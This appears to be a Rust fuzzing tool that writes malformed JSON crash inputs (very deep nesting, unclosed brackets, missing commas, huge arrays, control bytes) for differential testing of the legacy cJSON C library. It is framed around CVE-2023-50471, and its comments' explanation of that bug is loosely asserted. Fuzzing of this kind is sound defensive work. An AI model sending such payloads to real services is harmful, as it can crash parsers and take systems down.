/// # CVE-2023-50471 Corpus Generator
///
/// This tool generates malicious JSON payloads specifically designed to trigger
/// known vulnerabilities in the legacy DaveGamble/cJSON C library:
///
/// 1. **CVE-2023-50471**: Heap corruption via malformed arrays
/// 2. **Stack Exhaustion**: Deep recursion without proper depth tracking
/// 3. **Buffer Overflow**: Extremely long arrays/objects
/// 4. **Missing Comma Attacks**: Arrays with missing separators
/// 5. **Unclosed Structure Attacks**: Memory leaks and use-after-free
///
/// ## Usage
///
/// ```bash
/// cargo run --bin corpus-generator -- --output ../corpus/fuzz_differential/
/// ```
///
/// ## Security Warning
///
/// ⚠️  The payloads generated by this tool are INTENTIONALLY MALICIOUS.
/// They are designed to crash, corrupt memory, and exploit vulnerabilities.
/// DO NOT use these payloads against production systems without authorization.

use rand::Rng;
use std::fs;
use std::io::Write;
use std::path::Path;

// ============================================================================
// Vulnerability-Specific Payload Generators
// ============================================================================

/// Generator for CVE-2023-50471: Heap Corruption via Malformed Arrays
struct CVE_2023_50471_Generator;

impl CVE_2023_50471_Generator {
    /// Generate deeply nested arrays that trigger heap corruption
    ///
    /// The vulnerability occurs when cJSON fails to properly track allocation
    /// sizes during deep nesting, leading to heap metadata corruption.
    fn generate_heap_corruption_payloads() -> Vec<Vec<u8>> {
        let mut payloads = Vec::new();
        
        // Pattern 1: Extremely deep nesting (triggers stack→heap corruption)
        for depth in [100, 500, 1000, 2000, 5000, 10000] {
            let mut payload = Vec::new();
            
            // Opening brackets
            for _ in 0..depth {
                payload.push(b'[');
            }
            
            // Core value
            payload.extend_from_slice(b"1");
            
            // Closing brackets
            for _ in 0..depth {
                payload.push(b']');
            }
            
            payloads.push(payload);
        }
        
        // Pattern 2: Deep nesting with UNCLOSED arrays (CVE-2023-50471 core)
        for depth in [100, 500, 1000, 2000] {
            let mut payload = Vec::new();
            
            // Opening brackets WITHOUT corresponding closes
            for _ in 0..depth {
                payload.push(b'[');
            }
            
            // Add some values
            payload.extend_from_slice(b"1,2,3");
            
            // DELIBERATELY omit closing brackets
            // This triggers the heap corruption as cJSON loses track of allocations
            
            payloads.push(payload);
        }
        
        // Pattern 3: Alternating open/close with missing closures
        for depth in [50, 100, 200] {
            let mut payload = Vec::new();
            
            for i in 0..depth {
                payload.push(b'[');
                payload.extend_from_slice(format!("{}", i).as_bytes());
                
                // Randomly omit closing brackets
                if i % 3 != 0 {
                    payload.push(b']');
                }
                
                if i < depth - 1 {
                    payload.push(b',');
                }
            }
            
            payloads.push(payload);
        }
        
        // Pattern 4: Nested arrays with interleaved objects (complex heap layout)
        for depth in [50, 100, 200] {
            let mut payload = Vec::new();
            
            for i in 0..depth {
                if i % 2 == 0 {
                    payload.push(b'[');
                } else {
                    payload.push(b'{');
                    payload.extend_from_slice(b"\"key\":");
                }
            }
            
            payload.extend_from_slice(b"null");
            
            // Close only HALF of the structures
            for i in 0..(depth / 2) {
                if i % 2 == 0 {
                    payload.push(b']');
                } else {
                    payload.push(b'}');
                }
            }
            
            payloads.push(payload);
        }
        
        payloads
    }
    
    /// Generate arrays with missing commas (triggers incorrect parsing)
    fn generate_missing_comma_payloads() -> Vec<Vec<u8>> {
        let mut payloads = Vec::new();
        
        // Pattern 1: Simple array, missing commas
        payloads.push(b"[1 2 3 4 5]".to_vec());
        payloads.push(b"[\"a\" \"b\" \"c\"]".to_vec());
        payloads.push(b"[true false null]".to_vec());
        
        // Pattern 2: Nested arrays, missing commas
        payloads.push(b"[[1 2] [3 4] [5 6]]".to_vec());
        payloads.push(b"[[1,2] [3,4]]".to_vec()); // Missing comma between sub-arrays
        
        // Pattern 3: Mixed objects and arrays, missing commas
        payloads.push(b"[{\"a\":1} {\"b\":2}]".to_vec());
        payloads.push(b"[{\"a\":1},{\"b\":2} {\"c\":3}]".to_vec());
        
        // Pattern 4: Large arrays with randomly missing commas
        for size in [10, 50, 100, 500] {
            let mut payload = Vec::new();
            payload.push(b'[');
            
            for i in 0..size {
                payload.extend_from_slice(format!("{}", i).as_bytes());
                
                // Randomly omit commas (triggers vulnerability)
                if i < size - 1 && i % 3 != 0 {
                    payload.push(b',');
                }
                // Every 3rd comma is missing!
            }
            
            payload.push(b']');
            payloads.push(payload);
        }
        
        // Pattern 5: Missing commas with deeply nested structures
        let mut payload = Vec::new();
        payload.extend_from_slice(b"[[1,2][3,4][5,6]]"); // Missing commas between arrays
        payloads.push(payload);
        
        payloads
    }
    
    /// Generate arrays that cause buffer overflows
    fn generate_buffer_overflow_payloads() -> Vec<Vec<u8>> {
        let mut payloads = Vec::new();
        
        // Pattern 1: Extremely long single array
        for size in [1000, 10000, 100000, 1000000] {
            let mut payload = Vec::new();
            payload.push(b'[');
            
            for i in 0..size {
                payload.push(b'1');
                if i < size - 1 {
                    payload.push(b',');
                }
            }
            
            payload.push(b']');
            payloads.push(payload);
        }
        
        // Pattern 2: Array with extremely long string values
        for str_len in [1000, 10000, 100000] {
            let mut payload = Vec::new();
            payload.push(b'[');
            payload.push(b'"');
            
            // Generate long string
            for _ in 0..str_len {
                payload.push(b'A');
            }
            
            payload.push(b'"');
            payload.push(b']');
            payloads.push(payload);
        }
        
        // Pattern 3: Array with extremely long key names (for objects)
        for key_len in [1000, 10000, 50000] {
            let mut payload = Vec::new();
            payload.push(b'[');
            payload.push(b'{');
            payload.push(b'"');
            
            for _ in 0..key_len {
                payload.push(b'K');
            }
            
            payload.extend_from_slice(b"\":1}]");
            payloads.push(payload);
        }
        
        payloads
    }
}

/// Generator for Stack Exhaustion Attacks
struct StackExhaustionGenerator;

impl StackExhaustionGenerator {
    /// Generate payloads that exhaust the call stack
    fn generate_stack_exhaustion_payloads() -> Vec<Vec<u8>> {
        let mut payloads = Vec::new();
        
        // Pattern 1: Pure array nesting (classic stack overflow)
        for depth in [500, 1000, 2000, 5000, 10000, 50000] {
            let mut payload = Vec::new();
            
            for _ in 0..depth {
                payload.push(b'[');
            }
            
            payload.push(b'1');
            
            for _ in 0..depth {
                payload.push(b']');
            }
            
            payloads.push(payload);
        }
        
        // Pattern 2: Pure object nesting
        for depth in [500, 1000, 2000, 5000] {
            let mut payload = Vec::new();
            
            for i in 0..depth {
                payload.push(b'{');
                payload.push(b'"');
                payload.push(b'a' + (i % 26) as u8);
                payload.extend_from_slice(b"\":");
            }
            
            payload.extend_from_slice(b"null");
            
            for _ in 0..depth {
                payload.push(b'}');
            }
            
            payloads.push(payload);
        }
        
        // Pattern 3: Alternating arrays and objects
        for depth in [500, 1000, 2000] {
            let mut payload = Vec::new();
            
            for i in 0..depth {
                if i % 2 == 0 {
                    payload.push(b'[');
                } else {
                    payload.extend_from_slice(b"{\"x\":");
                }
            }
            
            payload.push(b'1');
            
            for i in (0..depth).rev() {
                if i % 2 == 0 {
                    payload.push(b']');
                } else {
                    payload.push(b'}');
                }
            }
            
            payloads.push(payload);
        }
        
        // Pattern 4: Nested arrays with values at each level (more memory pressure)
        for depth in [200, 500, 1000] {
            let mut payload = Vec::new();
            
            for i in 0..depth {
                payload.push(b'[');
                payload.extend_from_slice(format!("{}", i).as_bytes());
                payload.push(b',');
            }
            
            payload.push(b'0');
            
            for _ in 0..depth {
                payload.push(b']');
            }
            
            payloads.push(payload);
        }
        
        payloads
    }
}

/// Generator for Edge Case Attacks
struct EdgeCaseGenerator;

impl EdgeCaseGenerator {
    /// Generate edge case payloads
    fn generate_edge_cases() -> Vec<Vec<u8>> {
        let mut payloads = Vec::new();
        
        // Empty and minimal cases
        payloads.push(b"".to_vec());
        payloads.push(b"[".to_vec());
        payloads.push(b"]".to_vec());
        payloads.push(b"[[".to_vec());
        payloads.push(b"]]".to_vec());
        payloads.push(b"[[[".to_vec());
        
        // Mismatched brackets
        payloads.push(b"[[[]]".to_vec());
        payloads.push(b"[[]]]".to_vec());
        payloads.push(b"[{]}".to_vec());
        payloads.push(b"{[}]".to_vec());
        
        // Null bytes (potential string termination issues)
        payloads.push(vec![b'[', 0x00, b']']);
        payloads.push(vec![b'"', 0x00, b'"']);
        payloads.push(vec![b'[', b'"', 0x00, b'"', b']']);
        
        // Control characters
        for ctrl in 0x00..=0x1F {
            payloads.push(vec![b'[', ctrl, b']']);
        }
        
        // Maximum values
        payloads.push(b"[9999999999999999999999999999999]".to_vec());
        payloads.push(b"[-9999999999999999999999999999999]".to_vec());
        payloads.push(b"[1e308]".to_vec());
        payloads.push(b"[1e-324]".to_vec());
        
        // Unicode edge cases
        payloads.push(b"[\"\\uD800\"]".to_vec()); // Lone high surrogate
        payloads.push(b"[\"\\uDFFF\"]".to_vec()); // Lone low surrogate
        payloads.push(b"[\"\\uD800\\uD800\"]".to_vec()); // Two high surrogates
        
        // Whitespace abuse
        let mut ws_payload = Vec::new();
        ws_payload.push(b'[');
        for _ in 0..10000 {
            ws_payload.push(b' ');
        }
        ws_payload.push(b'1');
        for _ in 0..10000 {
            ws_payload.push(b' ');
        }
        ws_payload.push(b']');
        payloads.push(ws_payload);
        
        payloads
    }
}

/// Generator for Fuzzing-Optimized Payloads
struct FuzzingOptimizedGenerator;

impl FuzzingOptimizedGenerator {
    /// Generate payloads optimized for fuzzer efficiency
    fn generate_fuzzing_seeds() -> Vec<Vec<u8>> {
        let mut payloads = Vec::new();
        let mut rng = rand::thread_rng();
        
        // Random deep nesting with varying depths
        for _ in 0..50 {
            let depth: usize = rng.gen_range(10..500);
            let mut payload = Vec::new();
            
            for _ in 0..depth {
                payload.push(b'[');
            }
            
            // Random value
            match rng.gen_range(0..5) {
                0 => payload.push(b'0'),
                1 => payload.extend_from_slice(b"null"),
                2 => payload.extend_from_slice(b"true"),
                3 => payload.extend_from_slice(b"false"),
                _ => payload.extend_from_slice(b"\"x\""),
            }
            
            // Random number of closes (create unclosed arrays)
            let closes = rng.gen_range(0..=depth);
            for _ in 0..closes {
                payload.push(b']');
            }
            
            payloads.push(payload);
        }
        
        // Random comma omissions
        for _ in 0..50 {
            let size: usize = rng.gen_range(5..100);
            let mut payload = Vec::new();
            payload.push(b'[');
            
            for i in 0..size {
                payload.push(b'1');
                
                // Randomly omit commas
                if i < size - 1 && rng.gen_bool(0.7) {
                    payload.push(b',');
                }
            }
            
            payload.push(b']');
            payloads.push(payload);
        }
        
        // Mixed structural errors
        for _ in 0..50 {
            let mut payload = Vec::new();
            let len = rng.gen_range(10..200);
            
            for _ in 0..len {
                match rng.gen_range(0..10) {
                    0 => payload.push(b'['),
                    1 => payload.push(b']'),
                    2 => payload.push(b'{'),
                    3 => payload.push(b'}'),
                    4 => payload.push(b','),
                    5 => payload.push(b':'),
                    6 => payload.push(b'"'),
                    7 => payload.extend_from_slice(b"null"),
                    8 => payload.push(b'0'),
                    _ => payload.push(b' '),
                }
            }
            
            payloads.push(payload);
        }
        
        payloads
    }
}

// ============================================================================
// Main Corpus Generator
// ============================================================================

fn main() {
    println!("╔═══════════════════════════════════════════════════════════════════════════╗");
    println!("║                                                                           ║");
    println!("║         CVE-2023-50471 Vulnerability Corpus Generator                     ║");
    println!("║                                                                           ║");
    println!("║  Generates malicious JSON payloads designed to trigger known             ║");
    println!("║  vulnerabilities in the legacy DaveGamble/cJSON C library.               ║");
    println!("║                                                                           ║");
    println!("╚═══════════════════════════════════════════════════════════════════════════╝");
    println!();
    
    // Create output directory
    let output_dir = Path::new("../corpus/fuzz_differential");
    fs::create_dir_all(output_dir).expect("Failed to create output directory");
    
    let mut total_payloads = 0;
    
    // Generate CVE-2023-50471 specific payloads
    println!("🚨 Generating CVE-2023-50471 (Heap Corruption) payloads...");
    let heap_payloads = CVE_2023_50471_Generator::generate_heap_corruption_payloads();
    save_payloads(&heap_payloads, output_dir, "cve_2023_50471_heap", &mut total_payloads);
    
    println!("🚨 Generating Missing Comma Attack payloads...");
    let comma_payloads = CVE_2023_50471_Generator::generate_missing_comma_payloads();
    save_payloads(&comma_payloads, output_dir, "cve_2023_50471_comma", &mut total_payloads);
    
    println!("🚨 Generating Buffer Overflow payloads...");
    let overflow_payloads = CVE_2023_50471_Generator::generate_buffer_overflow_payloads();
    save_payloads(&overflow_payloads, output_dir, "buffer_overflow", &mut total_payloads);
    
    // Generate Stack Exhaustion payloads
    println!("💥 Generating Stack Exhaustion payloads...");
    let stack_payloads = StackExhaustionGenerator::generate_stack_exhaustion_payloads();
    save_payloads(&stack_payloads, output_dir, "stack_exhaustion", &mut total_payloads);
    
    // Generate Edge Cases
    println!("🔍 Generating Edge Case payloads...");
    let edge_payloads = EdgeCaseGenerator::generate_edge_cases();
    save_payloads(&edge_payloads, output_dir, "edge_cases", &mut total_payloads);
    
    // Generate Fuzzing-Optimized Seeds
    println!("🎲 Generating Fuzzing-Optimized seed payloads...");
    let fuzz_payloads = FuzzingOptimizedGenerator::generate_fuzzing_seeds();
    save_payloads(&fuzz_payloads, output_dir, "fuzz_seeds", &mut total_payloads);
    
    println!();
    println!("╔═══════════════════════════════════════════════════════════════════════════╗");
    println!("║                         CORPUS GENERATION COMPLETE                        ║");
    println!("╠═══════════════════════════════════════════════════════════════════════════╣");
    println!("║ Total Payloads Generated: {:>48} ║", total_payloads);
    println!("║ Output Directory: {:>56} ║", truncate_path(output_dir.display().to_string(), 56));
    println!("╠═══════════════════════════════════════════════════════════════════════════╣");
    println!("║                                                                           ║");
    println!("║  ⚠️  WARNING: These payloads are INTENTIONALLY MALICIOUS                  ║");
    println!("║                                                                           ║");
    println!("║  They are designed to:                                                    ║");
    println!("║    • Crash the C parser                                                   ║");
    println!("║    • Corrupt heap memory                                                  ║");
    println!("║    • Exhaust the stack                                                    ║");
    println!("║    • Trigger CVE-2023-50471                                               ║");
    println!("║                                                                           ║");
    println!("║  Use ONLY in controlled fuzzing environments!                            ║");
    println!("║                                                                           ║");
    println!("╚═══════════════════════════════════════════════════════════════════════════╝");
    println!();
    println!("Next steps:");
    println!("  1. cd ../");
    println!("  2. cargo +nightly fuzz run fuzz_differential");
    println!("  3. Watch for crash artifacts in artifacts/fuzz_differential/");
    println!();
}

fn save_payloads(payloads: &[Vec<u8>], output_dir: &Path, prefix: &str, counter: &mut usize) {
    for (i, payload) in payloads.iter().enumerate() {
        let filename = format!("{}_{:04}.json", prefix, i);
        let filepath = output_dir.join(filename);
        
        let mut file = fs::File::create(&filepath)
            .expect("Failed to create payload file");
        
        file.write_all(payload)
            .expect("Failed to write payload");
        
        *counter += 1;
    }
    
    println!("  ✓ Generated {} payloads with prefix '{}'", payloads.len(), prefix);
}

fn truncate_path(s: String, max_len: usize) -> String {
    if s.len() <= max_len {
        format!("{:width$}", s, width = max_len)
    } else {
        format!("...{:width$}", &s[s.len() - max_len + 3..], width = max_len - 3)
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    
    #[test]
    fn test_heap_corruption_generation() {
        let payloads = CVE_2023_50471_Generator::generate_heap_corruption_payloads();
        assert!(!payloads.is_empty());
        
        // Verify we have deeply nested arrays
        let deep = payloads.iter().find(|p| p.iter().filter(|&&b| b == b'[').count() > 1000);
        assert!(deep.is_some(), "Should have deeply nested arrays");
    }
    
    #[test]
    fn test_missing_comma_generation() {
        let payloads = CVE_2023_50471_Generator::generate_missing_comma_payloads();
        assert!(!payloads.is_empty());
        
        // Verify we have payloads with potential comma issues
        let has_numbers = payloads.iter().any(|p| {
            p.windows(3).any(|w| w[0].is_ascii_digit() && w[1] == b' ' && w[2].is_ascii_digit())
        });
        assert!(has_numbers, "Should have arrays with missing commas");
    }
    
    #[test]
    fn test_stack_exhaustion_generation() {
        let payloads = StackExhaustionGenerator::generate_stack_exhaustion_payloads();
        assert!(!payloads.is_empty());
        
        // Verify we have very deep nesting
        let very_deep = payloads.iter().find(|p| p.iter().filter(|&&b| b == b'[').count() > 5000);
        assert!(very_deep.is_some(), "Should have very deep nesting for stack exhaustion");
    }
}
